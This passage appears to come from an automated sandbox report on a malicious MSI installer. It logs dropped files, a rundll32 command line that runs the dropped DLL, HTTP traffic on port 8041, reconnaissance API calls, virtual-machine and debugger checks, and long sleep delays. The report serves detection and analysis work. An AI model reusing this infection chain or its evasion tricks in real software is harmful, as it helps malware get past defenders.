                  Source: C:\Windows\Installer\MSIF29D.tmpSection loaded: dlnashext.dllJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpSection loaded: wpdshext.dllJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                  Source: Binary string: kernel32.pdbUGP source: rundll32.exe, 00000006.00000003.2069928053.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernelbase.pdbUGP source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\BUILD\work\b69487f8af4577da\BUILDSENG\Release\x64\ArPotEx64.pdb source: rundll32.exe, 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmp, vierm_soft_x64.dll.1.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSIF29D.tmp, 00000004.00000000.2061647641.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSIF29D.tmp, 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSI7623.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr
                  Source: Binary string: ntdll.pdb source: rundll32.exe, 00000006.00000003.2066566980.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernel32.pdb source: rundll32.exe, 00000006.00000003.2069928053.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000006.00000003.2066566980.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF160.tmp.1.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF160.tmp.1.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSIF29D.tmp, 00000004.00000000.2061647641.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSIF29D.tmp, 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSI7623.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr
                  Source: Binary string: kernelbase.pdb source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp
                  Source: vierm_soft_x64.dll.1.drStatic PE information: real checksum: 0x81152 should be: 0xbc113
                  Source: vierm_soft_x64.dll.1.drStatic PE information: section name: memcpy_
                  Source: vierm_soft_x64.dll.1.drStatic PE information: section name: _RDATA
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FD323C push ecx; ret 4_2_00FD324F
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_3_000001FF4C9900D8 push cs; retf 6_3_000001FF4C9900FD
                  Source: C:\Windows\explorer.exeCode function: 8_2_0305EF4F push D5912897h; iretq 8_2_0305EF57
                  Source: C:\Windows\explorer.exeCode function: 8_2_0305F5BA push rcx; ret 8_2_0305F5BC
                  Source: C:\Windows\explorer.exeCode function: 8_2_0305EE21 push rsi; ret 8_2_0305EE27

                  Persistence and Installation Behavior

                  barindex
                  Drops executables to the windows directory (C:\Windows) and starts them
                  Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSIF29D.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\vierm_soft_x64.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF29D.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF101.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF1BF.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF1DF.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF160.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF29D.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF101.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF1BF.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF1DF.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF160.tmpJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Uses known network protocols on non-standard ports
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49723
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49745
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49775
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49787
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49824
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49827
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49842
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49844
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49851
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49857
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49863
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49869
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49897
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49903
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49910
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49912
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50020
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50021
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50023
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50024
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50026
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50027
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50029
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50030
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50030
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50032
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50033
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50036
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50037
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50039
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50040
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50042
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50043
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50052
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeCode function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,6_2_000001FF4CAF4D00
                  Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,8_2_03058424
                  Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,8_2_03057274
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 4125Jump to behavior
                  Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 5725Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8824Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 429Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 881Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 867Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\vierm_soft_x64.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF101.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF1BF.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF1DF.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF160.tmpJump to dropped file
                  Source: C:\Windows\System32\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-50480
                  Source: C:\Windows\Installer\MSIF29D.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-33659
                  Source: C:\Windows\Installer\MSIF29D.tmpAPI coverage: 6.8 %
                  Source: C:\Windows\System32\msiexec.exe TID: 3452Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\rundll32.exe TID: 3396Thread sleep count: 4125 > 30Jump to behavior
                  Source: C:\Windows\System32\rundll32.exe TID: 3396Thread sleep time: -247500000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\rundll32.exe TID: 3396Thread sleep count: 5725 > 30Jump to behavior
                  Source: C:\Windows\System32\rundll32.exe TID: 3396Thread sleep time: -343500000s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 6148Thread sleep count: 8824 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 6148Thread sleep time: -8824000s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 3924Thread sleep count: 429 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 3924Thread sleep time: -42900s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 6148Thread sleep count: 243 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 6148Thread sleep time: -243000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FEAF79 FindFirstFileExW,4_2_00FEAF79
                  Source: C:\Windows\explorer.exeCode function: 8_2_0305A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,8_2_0305A8E0
                  Source: C:\Windows\explorer.exeCode function: 8_2_03052B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,8_2_03052B28
                  Source: C:\Windows\explorer.exeCode function: 8_2_030604C0 FindFirstFileW,8_2_030604C0
                  Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 60000Jump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 60000Jump to behavior
                  Source: explorer.exe, 00000008.00000003.3094523211.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
                  Source: explorer.exe, 00000008.00000000.2452717662.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
                  Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000008.00000000.2452717662.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
                  Source: explorer.exe, 00000008.00000002.3333615520.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                  Source: explorer.exe, 00000008.00000000.2446927908.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
                  Source: rundll32.exe, 00000006.00000002.3332076257.000001FF4AE58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2171396063.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2452717662.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
                  Source: explorer.exe, 00000008.00000003.3094346841.000000000C8C5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                  Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
                  Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                  Source: explorer.exe, 00000008.00000002.3333615520.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
                  Source: explorer.exe, 00000008.00000003.3094523211.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
                  Source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                  Source: explorer.exe, 00000008.00000002.3333615520.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
                  Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2171396063.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWK
                  Source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                  Source: explorer.exe, 00000008.00000002.3333615520.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
                  Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
                  Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
                  Source: explorer.exe, 00000008.00000000.2446927908.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                  Source: explorer.exe, 00000008.00000000.2452717662.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000008.00000002.3335475832.0000000007693000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_6-49576
                  Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CADCCE0 LdrGetProcedureAddress,6_2_000001FF4CADCCE0
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FBD0A5 IsDebuggerPresent,OutputDebugStringW,4_2_00FBD0A5
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FE2DCC mov ecx, dword ptr fs:[00000030h]4_2_00FE2DCC
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FEAD78 mov eax, dword ptr fs:[00000030h]4_2_00FEAD78
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FB2310 GetProcessHeap,4_2_00FB2310
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIF29D.tmp "C:\Windows\Installer\MSIF29D.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCStateJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FD33A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00FD33A8
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FD353F SetUnhandledExceptionFilter,4_2_00FD353F
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FD2968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00FD2968
